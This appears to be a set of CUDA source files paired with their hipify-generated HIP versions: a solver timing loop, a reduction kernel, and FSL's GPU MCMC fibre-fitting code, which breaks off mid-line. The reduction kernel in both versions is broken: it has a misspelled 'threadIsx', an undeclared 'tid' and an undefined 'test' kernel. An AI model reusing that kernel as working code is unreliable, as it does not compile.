#include "mesh.h" #include "scattering.h" #include "potential.h" #include "computeTMatrix.h" #include "solveLS.h" #include <fstream> #include <iomanip> #include <cuda.h> #include <cuda_runtime.h> #include <curand_kernel.h> #include <cuComplex.h> #include <chrono> void datainsamling() { /* std::ofstream myfile; myfile.open("data.csv"); myfile << "Real av fasskift"; myfile << ","; myfile << "N"; myfile << "\n"; */ for (int i = 0; i < 5; i++) { using milli = std::chrono::microseconds; auto start = std::chrono::high_resolution_clock::now(); solveLS(); auto finish = std::chrono::high_resolution_clock::now(); std::cout << "myFunction() took " << std::chrono::duration_cast<milli>(finish - start).count() << " milliseconds\n"; } } int main() { datainsamling(); return 0; }
1e53ebd6436077871184634c40c1e506ba7fd221.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <assert.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> __global__ void reduce(int* inData, int* outData) { __shared__ int data[BLOCK_SIZE]; int threadId = threadIsx.x; int i = blockIdx.x * blockDim.x + threadId; data[threadId] = inData[i]; __syncthreads(); for (int s = blockDim.x / 2; s > 0; s >>= 1) { if (tid < s){ data [threadId] += data [threadId + s]; } __syncthreads(); } if (threadId == 0) { outData[blockIdx.x] = data[0]; } } int main( int argc, char** argv ) { hipLaunchKernelGGL(( test), dim3(1),dim3(1), 0, 0, ); hipDeviceSynchronize(); return 0; }
1e53ebd6436077871184634c40c1e506ba7fd221.cu
#include <stdio.h> #include <assert.h> #include <cuda.h> #include <cuda_runtime.h> __global__ void reduce(int* inData, int* outData) { __shared__ int data[BLOCK_SIZE]; int threadId = threadIsx.x; int i = blockIdx.x * blockDim.x + threadId; data[threadId] = inData[i]; __syncthreads(); for (int s = blockDim.x / 2; s > 0; s >>= 1) { if (tid < s){ data [threadId] += data [threadId + s]; } __syncthreads(); } if (threadId == 0) { outData[blockIdx.x] = data[0]; } } int main( int argc, char** argv ) { test<<<1,1>>>(); cudaDeviceSynchronize(); return 0; }
14d16088f662e62e322ab6ff4a54f0a15bb6e072.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* runmcmc.cu Tim Behrens, Saad Jbabdi, Stam Sotiropoulos, Moises Hernandez - FMRIB Image Analysis Group Copyright (C) 2005 University of Oxford */ /* Part of FSL - FMRIB's Software Library http://www.fmrib.ox.ac.uk/fsl [email protected] Developed at FMRIB (Oxford Centre for Functional Magnetic Resonance Imaging of the Brain), Department of Clinical Neurology, Oxford University, Oxford, UK LICENCE FMRIB Software Library, Release 5.0 (c) 2012, The University of Oxford (the "Software") The Software remains the property of the University of Oxford ("the University"). The Software is distributed "AS IS" under this Licence solely for non-commercial use in the hope that it will be useful, but in order that the University as a charitable foundation protects its assets for the benefit of its educational and research purposes, the University makes clear that no condition is made or to be implied, nor is any warranty given or to be implied, as to the accuracy of the Software, or that it will be suitable for any particular purpose or for use under any specific conditions. Furthermore, the University disclaims all responsibility for the use which is made of the Software. It further disclaims any liability for the outcomes arising from using the Software. The Licensee agrees to indemnify the University and hold the University harmless from and against any and all claims, damages and liabilities asserted by third parties (including claims for negligence) which arise directly or indirectly from the use of the Software or the sale of any products based on the Software. No part of the Software may be reproduced, modified, transmitted or transferred in any form or by any means, electronic or mechanical, without the express permission of the University. The permission of the University is not required if the said reproduction, modification, transmission or transference is done without financial return, the conditions of this Licence are imposed upon the receiver of the product, and all original and amended source code is included in any transmitted product. You may be held legally responsible for any copyright infringement that is caused or encouraged by your failure to abide by these terms and conditions. You are not permitted under this Licence to use this Software commercially. Use for which any financial return is received shall be defined as commercial use, and includes (1) integration of all or part of the source code or the Software into a product for sale or license by or on behalf of Licensee to third parties or (2) use of the Software or any derivative of it for research with the final aim of developing software products for sale or license to a third party or (3) use of the Software or any derivative of it for research with the final aim of developing non-software products for sale or license to a third party, or (4) use of the Software to provide any service to an external organisation for which payment is received. If you are interested in using the Software commercially, please contact Oxford University Innovation ("OUI"), the technology transfer company of the University, to negotiate a licence. Contact details are: [email protected] quoting reference DE/9564. */ #include "xfibresoptions.h" #include <hiprand/hiprand.h> #include "runmcmc_kernels.hip" #include "sync_check.h" #include <host_vector.h> #include <device_vector.h> #include <time.h> #include <sys/time.h> #include "init_gpu.h" using namespace Xfibres; ////////////////////////////////////////////////////// // MCMC ON GPU ////////////////////////////////////////////////////// void init_Fibres_Multifibres( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& params_gpu, thrust::device_vector<float>& tau_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, double seed, //OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<hiprandState_t>& randStates_gpu) { std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "----- MCMC ALGORITHM PART INITIALITATION ON GPU ----- " << "\n"; struct timeval t1,t2; double time; gettimeofday(&t1,NULL); int nvox = multifibres_gpu.size(); xfibresOptions& opts = xfibresOptions::getInstance(); int nfib= opts.nfibres.value(); int nparams_fit = 2+3*opts.nfibres.value(); if(opts.modelnum.value()>=2) nparams_fit++; if(opts.f0.value()) nparams_fit++; thrust::device_vector<double> angtmp_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); bool gradnonlin = opts.grad_file.set(); int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid_MCMC(blocks, 1); dim3 Dim_Block_MCMC(nthreads_block ,1); ///dimensions for MCMC float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *params_ptr = thrust::raw_pointer_cast(params_gpu.data()); float *tau_ptr = thrust::raw_pointer_cast(tau_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (3*nfib + 9)*sizeof(float) + sizeof(int)); myfile << "Shared Memory Used in init_Fibres_Multifibres: " << amount_shared << "\n"; hipLaunchKernelGGL(( init_Fibres_Multifibres_kernel), dim3(Dim_Grid_MCMC), dim3(Dim_Block_MCMC), amount_shared, 0, datam_ptr, params_ptr, tau_ptr, bvals_ptr, alpha_ptr, beta_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams_fit, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.rician.value(), opts.ardf0.value(), opts.all_ard.value(), opts.no_ard.value(), gradnonlin, angtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr); sync_check("init_Fibres_Multifibres_kernel"); // Initialise Randoms int total_threads= nvox; int blocks_Rand = total_threads/THREADS_BLOCK_RAND; if(total_threads%THREADS_BLOCK_RAND) blocks_Rand++; dim3 Dim_Grid_Rand(blocks_Rand,1); dim3 Dim_Block_Rand(THREADS_BLOCK_RAND,1); hipLaunchKernelGGL(( setup_randoms_kernel) , dim3(Dim_Grid_Rand),dim3(Dim_Block_Rand), 0, 0, randStates_ptr,seed,nvox); sync_check("Setup_Randoms_kernel"); gettimeofday(&t2,NULL); time=timeval_diff(&t2,&t1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_burnin( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, //INPUT-OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<hiprandState_t>& randStates_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART BURNIN ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<float> recors_null_gpu; recors_null_gpu.resize(1); thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *records_null = thrust::raw_pointer_cast(recors_null_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(hiprandState_t)); myfile << "Shared Memory Used in runmcmc_burnin: " << amount_shared << "\n"; if(nvox!=0){ hipLaunchKernelGGL(( runmcmc_kernel), dim3(Dim_Grid), dim3(Dim_Block), amount_shared , 0, datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.nburn.value(), 0, 0, 0, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr,records_null,records_null,records_null,records_null,records_null,records_null,records_null, records_null,records_null); sync_check("runmcmc_burnin_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_record( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, const int ndirections, thrust::device_vector<hiprandState_t>& randStates_gpu, string output_file, //OUTPUT thrust::device_vector<float>& rf0_gpu, thrust::device_vector<float>& rtau_gpu, thrust::device_vector<float>& rs0_gpu, thrust::device_vector<float>& rd_gpu, thrust::device_vector<float>& rdstd_gpu, thrust::device_vector<float>& rR_gpu, thrust::device_vector<float>& rth_gpu, thrust::device_vector<float>& rph_gpu, thrust::device_vector<float>& rf_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART RECORD ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int totalrecords = (opts.njumps.value()/opts.sampleevery.value()); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *rf0_ptr = thrust::raw_pointer_cast(rf0_gpu.data()); float *rtau_ptr = thrust::raw_pointer_cast(rtau_gpu.data()); float *rs0_ptr = thrust::raw_pointer_cast(rs0_gpu.data()); float *rd_ptr = thrust::raw_pointer_cast(rd_gpu.data()); float *rdstd_ptr = thrust::raw_pointer_cast(rdstd_gpu.data()); float *rR_ptr = thrust::raw_pointer_cast(rR_gpu.data()); float *rth_ptr = thrust::raw_pointer_cast(rth_gpu.data()); float *rph_ptr = thrust::raw_pointer_cast(rph_gpu.data()); float *rf_ptr = thrust::raw_pointer_cast(rf_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(hiprandState_t)); myfile << "Shared Memory Used in runmcmc_record: " << amount_shared << "\n"; if(nvox!=0){ hipLaunchKernelGGL(( runmcmc_kernel), dim3(Dim_Grid), dim3(Dim_Block), amount_shared , 0, datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.njumps.value(), opts.nburn.value(), opts.sampleevery.value(), totalrecords, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr, rf0_ptr, rtau_ptr, rs0_ptr, rd_ptr, rdstd_ptr, rR_ptr, rth_ptr, rph_ptr, rf_ptr); sync_check("runmcmc_record_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n" ; myfile.close(); }
14d16088f662e62e322ab6ff4a54f0a15bb6e072.cu
/* runmcmc.cu Tim Behrens, Saad Jbabdi, Stam Sotiropoulos, Moises Hernandez - FMRIB Image Analysis Group Copyright (C) 2005 University of Oxford */ /* Part of FSL - FMRIB's Software Library http://www.fmrib.ox.ac.uk/fsl [email protected] Developed at FMRIB (Oxford Centre for Functional Magnetic Resonance Imaging of the Brain), Department of Clinical Neurology, Oxford University, Oxford, UK LICENCE FMRIB Software Library, Release 5.0 (c) 2012, The University of Oxford (the "Software") The Software remains the property of the University of Oxford ("the University"). The Software is distributed "AS IS" under this Licence solely for non-commercial use in the hope that it will be useful, but in order that the University as a charitable foundation protects its assets for the benefit of its educational and research purposes, the University makes clear that no condition is made or to be implied, nor is any warranty given or to be implied, as to the accuracy of the Software, or that it will be suitable for any particular purpose or for use under any specific conditions. Furthermore, the University disclaims all responsibility for the use which is made of the Software. It further disclaims any liability for the outcomes arising from using the Software. The Licensee agrees to indemnify the University and hold the University harmless from and against any and all claims, damages and liabilities asserted by third parties (including claims for negligence) which arise directly or indirectly from the use of the Software or the sale of any products based on the Software. No part of the Software may be reproduced, modified, transmitted or transferred in any form or by any means, electronic or mechanical, without the express permission of the University. The permission of the University is not required if the said reproduction, modification, transmission or transference is done without financial return, the conditions of this Licence are imposed upon the receiver of the product, and all original and amended source code is included in any transmitted product. You may be held legally responsible for any copyright infringement that is caused or encouraged by your failure to abide by these terms and conditions. You are not permitted under this Licence to use this Software commercially. Use for which any financial return is received shall be defined as commercial use, and includes (1) integration of all or part of the source code or the Software into a product for sale or license by or on behalf of Licensee to third parties or (2) use of the Software or any derivative of it for research with the final aim of developing software products for sale or license to a third party or (3) use of the Software or any derivative of it for research with the final aim of developing non-software products for sale or license to a third party, or (4) use of the Software to provide any service to an external organisation for which payment is received. If you are interested in using the Software commercially, please contact Oxford University Innovation ("OUI"), the technology transfer company of the University, to negotiate a licence. Contact details are: [email protected] quoting reference DE/9564. */ #include "xfibresoptions.h" #include <curand.h> #include "runmcmc_kernels.cu" #include "sync_check.h" #include <host_vector.h> #include <device_vector.h> #include <time.h> #include <sys/time.h> #include "init_gpu.h" using namespace Xfibres; ////////////////////////////////////////////////////// // MCMC ON GPU ////////////////////////////////////////////////////// void init_Fibres_Multifibres( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& params_gpu, thrust::device_vector<float>& tau_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, double seed, //OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<curandState>& randStates_gpu) { std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "----- MCMC ALGORITHM PART INITIALITATION ON GPU ----- " << "\n"; struct timeval t1,t2; double time; gettimeofday(&t1,NULL); int nvox = multifibres_gpu.size(); xfibresOptions& opts = xfibresOptions::getInstance(); int nfib= opts.nfibres.value(); int nparams_fit = 2+3*opts.nfibres.value(); if(opts.modelnum.value()>=2) nparams_fit++; if(opts.f0.value()) nparams_fit++; thrust::device_vector<double> angtmp_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); bool gradnonlin = opts.grad_file.set(); int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid_MCMC(blocks, 1); dim3 Dim_Block_MCMC(nthreads_block ,1); ///dimensions for MCMC float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *params_ptr = thrust::raw_pointer_cast(params_gpu.data()); float *tau_ptr = thrust::raw_pointer_cast(tau_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (3*nfib + 9)*sizeof(float) + sizeof(int)); myfile << "Shared Memory Used in init_Fibres_Multifibres: " << amount_shared << "\n"; init_Fibres_Multifibres_kernel<<< Dim_Grid_MCMC, Dim_Block_MCMC, amount_shared>>>(datam_ptr, params_ptr, tau_ptr, bvals_ptr, alpha_ptr, beta_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams_fit, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.rician.value(), opts.ardf0.value(), opts.all_ard.value(), opts.no_ard.value(), gradnonlin, angtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr); sync_check("init_Fibres_Multifibres_kernel"); // Initialise Randoms int total_threads= nvox; int blocks_Rand = total_threads/THREADS_BLOCK_RAND; if(total_threads%THREADS_BLOCK_RAND) blocks_Rand++; dim3 Dim_Grid_Rand(blocks_Rand,1); dim3 Dim_Block_Rand(THREADS_BLOCK_RAND,1); setup_randoms_kernel <<<Dim_Grid_Rand,Dim_Block_Rand>>>(randStates_ptr,seed,nvox); sync_check("Setup_Randoms_kernel"); gettimeofday(&t2,NULL); time=timeval_diff(&t2,&t1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_burnin( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, //INPUT-OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<curandState>& randStates_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART BURNIN ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<float> recors_null_gpu; recors_null_gpu.resize(1); thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *records_null = thrust::raw_pointer_cast(recors_null_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(curandState)); myfile << "Shared Memory Used in runmcmc_burnin: " << amount_shared << "\n"; if(nvox!=0){ runmcmc_kernel<<< Dim_Grid, Dim_Block, amount_shared >>>(datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.nburn.value(), 0, 0, 0, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr,records_null,records_null,records_null,records_null,records_null,records_null,records_null, records_null,records_null); sync_check("runmcmc_burnin_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_record( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, const int ndirections, thrust::device_vector<curandState>& randStates_gpu, string output_file, //OUTPUT thrust::device_vector<float>& rf0_gpu, thrust::device_vector<float>& rtau_gpu, thrust::device_vector<float>& rs0_gpu, thrust::device_vector<float>& rd_gpu, thrust::device_vector<float>& rdstd_gpu, thrust::device_vector<float>& rR_gpu, thrust::device_vector<float>& rth_gpu, thrust::device_vector<float>& rph_gpu, thrust::device_vector<float>& rf_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART RECORD ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int totalrecords = (opts.njumps.value()/opts.sampleevery.value()); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << 